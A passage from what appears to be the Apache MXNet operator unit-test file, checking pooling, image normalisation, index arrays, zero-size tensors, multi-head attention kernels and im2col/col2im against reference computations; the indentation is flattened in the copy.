kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
        def check_random_poisson():
            lam = 4
            assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
        def check_random_uniform():
            low = 0
            high = 1
            assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
